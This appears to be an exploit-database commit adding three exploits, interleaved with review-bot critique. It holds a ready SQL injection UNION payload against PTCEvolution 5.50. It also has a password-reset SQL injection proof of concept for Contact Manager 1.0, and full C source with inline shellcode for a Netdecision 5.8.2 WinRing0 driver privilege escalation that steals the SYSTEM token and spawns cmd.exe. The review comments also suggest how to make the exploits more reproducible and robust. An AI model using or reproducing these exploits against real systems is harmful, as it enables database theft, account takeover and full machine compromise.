DB: 2017-09-18
3 new exploits

Netdecision 5.8.2 - Local Privilege Escalation
PTCEvolution 5.50 - SQL Injection
Contact Manager 1.0 - 'femail' Parameter SQL Injection
parent
db8b5bc2fe
commit
bc6f82924c
4 changed files with 395 additions and 0 deletions
@ -9236,6 +9236,7 @@ id,file,description,date,author,platform,type,port
|
|||
42626,platforms/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",linux,local,0
|
||||
42665,platforms/windows/local/42665.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation",2017-09-12,mr_me,windows,local,0
|
||||
42718,platforms/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",windows,local,0
|
||||
42735,platforms/windows/local/42735.c,"Netdecision 5.8.2 - Local Privilege Escalation",2017-09-16,"Peter Baris",windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -38511,3 +38512,5 @@ id,file,description,date,author,platform,type,port
|
|||
42729,platforms/hardware/webapps/42729.py,"D-Link DIR8xx Routers - Leak Credentials",2017-09-12,embedi,hardware,webapps,0
|
||||
42730,platforms/hardware/webapps/42730.py,"D-Link DIR8xx Routers - Root Remote Code Execution",2017-09-12,embedi,hardware,webapps,0
|
||||
42731,platforms/hardware/webapps/42731.sh,"D-Link DIR8xx Routers - Local Firmware Upload",2017-09-12,embedi,hardware,webapps,0
|
||||
42733,platforms/php/webapps/42733.txt,"PTCEvolution 5.50 - SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps,0
|
||||
42734,platforms/php/webapps/42734.txt,"Contact Manager 1.0 - 'femail' Parameter SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps,0
|
||||
|
|
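Review bot: The index rows disagree with the advisories they point at: line 42735 records the date as 2017-09-16 while the exploit header in 42735.c says 2017.09.17, and line 42734 titles the entry "Contact Manager 1.0 - 'femail' Parameter SQL Injection" while 42734.txt's own title is "Contact Manager 1.0 - SQL Injection". Either the advisories or the CSV should be adjusted so searches by date or title return consistent results; the 42733 row matches its file. The hunk only shows part of files.csv, so rows outside it were not checked.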
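--- /dev/null
+++ b/platforms/php/webapps/42733.txt
@@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: PTCEvolution 5.50 - SQL Injection
+# Dork: N/A
+# Date: 15.09.2017
+# Vendor Homepage: http://ptcevolution.com/
+# Software Link: http://www.ptcevolution.com/demoo/
+# Demo: http://demo.ptcevolution.com/
+# Version: 5.50
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?view=product&id=[SQL]
+# http://localhost/[PATH]/index.php?view=products&id=[SQL]
+#
+# -4++/*!03333UNION*/(/*!03333SELECT*/+(1),(/*!03333Select*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!03333from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!03333column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9))--+-
+#
+# Etc..
+# # # # #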
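Review bot: The advisory gives no vulnerable source, no vendor notification date and a single payload, so a reader cannot tell what the injection context is: the payload is a 9-column UNION that uses MySQL version-conditional comments (`/*!03333UNION*/`) and `+` in place of spaces, and dumps `information_schema.columns` through `export_set`, which only works when the backing SELECT at `view=product`/`view=products` has exactly nine columns and the backend is MySQL. A line such as `# Method: GET, parameter id, unauthenticated (verify); MySQL, 9-column UNION` would let a tester reproduce it without reverse-engineering the payload. The `Description` line is the same boilerplate sentence used in the sibling advisory and says nothing about this product; state which query is affected and whether the endpoint requires a session. A disclosure-timeline line (vendor contacted / no response) would also be expected alongside `CVE: N/A`.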
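--- /dev/null
+++ b/platforms/php/webapps/42734.txt
@@ -0,0 +1,51 @@
+# # # # #
+# Exploit Title: Contact Manager 1.0 - SQL Injection
+# Dork: N/A
+# Date: 15.09.2017
+# Vendor Homepage: http://savsofteproducts.com/
+# Software Link: http://www.contactmanagerscript.com/download/contact_manager_1380185909.zip
+# Demo: http://contactmanagerscript.com/demo/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Vulnerable Source:
+#
+# .............
+# <a href="login.php?forgot=1">Forgot Password ?</a>
+# <?php
+# if(isset($_REQUEST["forgot"])){
+# if($_REQUEST["forgot"]=="2"){
+# $result=mysql_query("select * from co_setting where Email='$_REQUEST[femail]' ");
+# $count=mysql_num_rows($result);
+# if($count==1)
+#
+# {
+#
+# $npass=rand("5556","99999");
+#
+# $to = $row['femail'];
+# $subject = "Password Reset";
+# $message = "New Primary Password is: $npass \r\n";
+# $headers = "From: $Email";
+#
+# $npass=md5($npass);
+#
+# $query="update co_setting set Password='$npass' where Email='$_REQUEST[femail]'";
+# mysql_query($query);
+# .............
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/login.php?forgot=2&femail=[SQL]
+#
+# Etc..
+# # # # #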
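Review bot: The description under-states the impact: the quoted source shows the same unsanitized `$_REQUEST[femail]` reaching not only the SELECT but also the UPDATE that overwrites `co_setting.Password`, so any value that makes the first query return exactly one row (the `if($count==1)` gate) lets an unauthenticated caller reset an arbitrary account's password rather than merely read data. The replacement password comes from `rand("5556","99999")`, a keyspace of under 95k values, so after the reset the account is also brute-forceable; the description should say `# Impact: unauthenticated password reset of any co_setting row via the UPDATE, new password is a 4-5 digit number`. In the excerpt `$row` is never populated (`$to = $row['femail']` follows `mysql_num_rows` with no fetch visible), which suggests the reset mail never reaches the real owner, though code elided by the `.............` markers may set it. A disclosure-timeline line alongside `CVE: N/A` would be expected as well.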
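--- /dev/null
+++ b/platforms/windows/local/42735.c
@@ -0,0 +1,313 @@
+// Netdecision.cpp : Defines the entry point for the console application.
+/*
+# Exploit Title: Netdecision 5.8.2 - Local Privilege Escalation - Winring0x32.sys
+# Date: 2017.09.17
+# Exploit Author: Peter Baris
+# Vendor Homepage: www.netmechanica.com
+# Software Link: http://www.netmechanica.com/downloads/ //registration required
+# Version: 5.8.2
+# Tested on: Windows 7 Pro SP1 x86 / Windows 7 Enterprise SP1
+# CVE : CVE-2017-14311
+
+Vendor notified on 2017.09.11 - no response */
+
+#include "stdafx.h"
+#include <stdio.h>
+#include <Windows.h>
+#include <winioctl.h>
+#include <tlhelp32.h>
+#include <Psapi.h>
+
+#define DEVICE_NAME L"\\\\.\\WinRing0_1_2_0"
+
+
+
+
+LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
+HANDLE GetDeviceHandle(LPCTSTR FileName) {
+HANDLE hFile = NULL;
+
+hFile = CreateFile(FileName,
+GENERIC_READ | GENERIC_WRITE,
+0,
+0,
+OPEN_EXISTING,
+NULL,
+0);
+
+return hFile;
+}
+
+
+extern ULONG ZwYieldExecution = NULL;
+extern PVOID KernelBaseAddressInKernelMode = NULL;
+extern HMODULE hKernelInUserMode = NULL;
+
+VOID GetKiFastSystemCall() {
+
+SIZE_T ReturnLength;
+HMODULE hntdll = NULL;
+
+ULONG ZwYieldExecution_offset;
+
+
+hntdll = LoadLibraryA("ntdll.dll");
+
+if (!hntdll) {
+printf("[-] Failed to Load ntdll.dll: 0x%X\n", GetLastError());
+exit(EXIT_FAILURE);
+}
+
+LPVOID drivers[1024];
+DWORD cbNeeded;
+
+EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
+KernelBaseAddressInKernelMode = drivers[0];
+
+
+printf("[+] Kernel base address: 0x%X\n", KernelBaseAddressInKernelMode);
+
+hKernelInUserMode = LoadLibraryA("ntkrnlpa.exe");
+
+if (!hKernelInUserMode) {
+printf("[-] Failed to load kernel: 0x%X\n", GetLastError());
+exit;
+}
+
+
+printf("[+] KernelImage Base in User-Mode 0x%X\r\n", hKernelInUserMode);
+
+
+
+
+ZwYieldExecution = GetProcAddress(hKernelInUserMode, "ZwYieldExecution");
+
+if (!ZwYieldExecution) {
+printf("[-] Failed to resolve KiFastSystemCall: 0x%X\n", GetLastError());
+exit;
+}
+
+ZwYieldExecution_offset = (ULONG)ZwYieldExecution - (ULONG)hKernelInUserMode;
+printf("[+] ZwYieldExecution's offset address in ntkrnlpa.exe: 0x%X\n", ZwYieldExecution_offset);
+
+
+(ULONG)ZwYieldExecution = (ULONG)ZwYieldExecution_offset + (ULONG)KernelBaseAddressInKernelMode;
+
+printf("[+] ZwYieldExecution's address in kernel-mode: 0x%X\n", ZwYieldExecution);
+
+
+if (hntdll) {
+FreeLibrary(hntdll);
+}
+
+if (hKernelInUserMode) {
+FreeLibrary(hKernelInUserMode);
+}
+
+hntdll = NULL;
+
+return hKernelInUserMode;
+return ZwYieldExecution;
+}
+
+
+extern ULONG eip = NULL;
+extern ULONG pesp = NULL;
+extern ULONG pebp = NULL;
+extern ULONG ETHREAD = NULL;
+
+ULONG Shellcode() {
+
+ULONG FunctionAddress = ZwYieldExecution;
+
+__asm {
+
+pushad
+pushfd
+xor eax,eax
+
+mov edi, FunctionAddress ; Address of ZwYieldExection to EDI
+
+SearchCall:
+mov eax, 0xe8
+scasb
+jnz SearchCall
+
+mov ebx, edi
+mov ecx, [edi]
+add ebx, ecx; EBX points to KiSystemService
+add ebx, 0x4
+
+lea edi, [ebx - 0x1]
+SearchFastCallEntry:
+mov eax, 0x00000023
+scasd
+jnz SearchFastCallEntry
+mov eax, 0xa10f306a
+scasd
+jnz SearchFastCallEntry
+
+lea eax,[edi-0x9]
+xor edx, edx
+mov ecx, 0x176
+
+
+wrmsr
+popfd
+popad
+
+
+mov eax,ETHREAD
+
+mov eax,[eax]
+mov eax, [eax+0x050]
+mov ecx, eax
+mov edx, 0x4
+
+FindSystemProcess :
+mov eax, [eax + 0x0B8]
+sub eax, 0x0B8
+cmp[eax + 0x0B4], edx
+jne FindSystemProcess
+
+
+mov edx, [eax + 0x0F8]
+mov[ecx + 0x0F8], edx
+
+;xor eax, eax
+mov esp,pesp
+mov ebp,pebp
+
+push eip
+; int 3
+ret
+
+}
+
+}
+
+
+
+int main()
+{
+HANDLE hlib = NULL;
+HANDLE hFile = NULL;
+PVOID lpInBuffer = NULL;
+ULONG lpOutBuffer = NULL;
+ULONG lpBytesReturned;
+PVOID BuffAddress = NULL;
+SIZE_T BufferSize = 0x1000;
+SIZE_T nOutBufferSize = 0x800;
+ULONG Interval = 0;
+ULONG Shell = &Shellcode;
+NTSTATUS NtStatus = NULL;
+
+
+
+/* Undocumented feature to trigger the vulnerability */
+hlib = LoadLibraryA("ntdll.dll");
+
+if (!hlib) {
+printf("[-] Failed to load the library: 0x%X\n", GetLastError());
+exit(EXIT_FAILURE);
+}
+
+
+GetKiFastSystemCall();
+
+/* Allocate memory for our input and output buffers */
+lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+
+/*Getting KiFastSystemCall address from ntdll.dll to restore it in 0x176 MSR*/
+
+
+lpOutBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+//printf("[+] Address to write our shellcode's address to: 0x%X\r\n", lpOutBuffer);
+
+
+/* Crafting the input buffer */
+
+BuffAddress = (PVOID)(((ULONG)lpInBuffer));
+*(PULONG)BuffAddress = (ULONG)0x00000176; /*IA32_SYSENTER_EIP MSR*/
+BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0x4));
+*(PULONG)BuffAddress = (ULONG)Shell; /*Our assembly shellcode Pointer into EAX*/
+BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0x8));
+*(PULONG)BuffAddress = (ULONG)0x00000000; /* EDX is 0x00000000 in 32bit mode */
+BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0xc));
+*(PULONG)BuffAddress = (ULONG)0x00000000;
+
+
+//RtlFillMemory(lpInBuffer, BufferSize, 0x41);
+//RtlFillMemory(lpOutBuffer, BufferSize, 0x42);
+
+
+//printf("[+] Trying the get the handle for the WinRing0_1_2_0 device.\r\n");
+
+hFile = GetDeviceHandle(FileName);
+
+if (hFile == INVALID_HANDLE_VALUE) {
+printf("[-] Can't get the device handle. 0x%X\r\n", GetLastError());
+return 1;
+}
+else
+{
+printf("[+] Handle opened for WinRing0x32. Sending IOCTL.\r\n");
+}
+
+/*Here we calculate the EIP for our return from kernel-mode. This exploit does not let us simply adjust the stack and return*/
+
+(HANDLE)eip = GetModuleHandleA(NULL); /*Getting the base address of our process*/
+printf("[+] Current process base address 0x%X\r\n", (HANDLE)eip);
+(HANDLE)eip = eip + 0x13ae; /*Any time you change something in the main() section you MUST adjust the offset to point to the PUSH 40 instrction*/
+printf("[+] Return address (EIP) from kernel-mode 0x%X\r\n", (HANDLE)eip);
+
+/*Setting CPU affinity before execution to maximize the chance of executing our code on the same CPU core*/
+DWORD_PTR i = 1; /*CPU Core with ID 1 will be always chosen for the execution*/
+
+ULONG affinity = SetThreadAffinityMask(GetCurrentThread(), i);
+
+printf("[+] Setting affinity for logical CPU with ID:%d\r\n", i);
+if (affinity == NULL) {
+
+printf("[-] Something went wrong while setting CPU affinity 0x%X\r\n", GetLastError());
+exit(1);
+}
+
+ETHREAD = (ULONG)KernelBaseAddressInKernelMode + 0x12bd24; /*Offset to nt!KiInitialThread as TEB is not readable*/
+
+/*Saving stack pointer and stack frame of user-mode before diving in kernel-mode to restore it before returning to user-mode */
+
+__asm {
+
+mov pesp, esp
+mov pebp, ebp
+nop
+}
+
+
+DeviceIoControl(hFile,
+0x9C402088,
+lpInBuffer,
+0x10,
+lpOutBuffer,
+0x20,
+&lpBytesReturned,
+NULL);
+
+
+
+STARTUPINFO info = { sizeof(info) };
+PROCESS_INFORMATION processInfo;
+NTSTATUS proc;
+LPCSTR command = L"C:\\Windows\\System32\\cmd.exe";
+proc = CreateProcess(command, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &info, &processInfo);
+
+if (!proc) {
+
+printf("ERROR 0x%X\r\n", proc);
+}
+WaitForSingleObject(processInfo.hProcess, INFINITE);
+
+
+exit(0);
+}
+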
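Review bot: The two failure paths in `GetKiFastSystemCall()` do not abort: `exit;` after the `LoadLibraryA("ntkrnlpa.exe")` and `GetProcAddress` checks is an expression statement that evaluates the function designator and discards it, so on failure the code goes on to compute `ZwYieldExecution` from a NULL base and `main()` still sends the MSR-write IOCTL with that value in `IA32_SYSENTER_EIP`, which bugchecks the host instead of failing cleanly; both should read `exit(EXIT_FAILURE);`. The `return hKernelInUserMode;` / `return ZwYieldExecution;` lines at the end of the same `VOID` function are dead and ill-formed and should be dropped, and `DeviceIoControl`'s return value is never checked before `CreateProcess` is called, so a rejected IOCTL is indistinguishable from success. The hard-coded values (`eip + 0x13ae`, `KernelBaseAddressInKernelMode + 0x12bd24`, the EPROCESS `0xB8`/`0xB4`/`0xF8` offsets in the shellcode, the `ntkrnlpa.exe` image name and `drivers[0]` as the kernel base) bind this to the Windows 7 SP1 x86 build it was tested on, and the header comment should say so rather than leaving it to the `PUSH 40` remark inside `main()`. A one-line defender note that the primitive is an unrestricted `wrmsr` reachable by any user who can open `\\.\WinRing0_1_2_0` would help triage, since that is what the IOCTL and input buffer show.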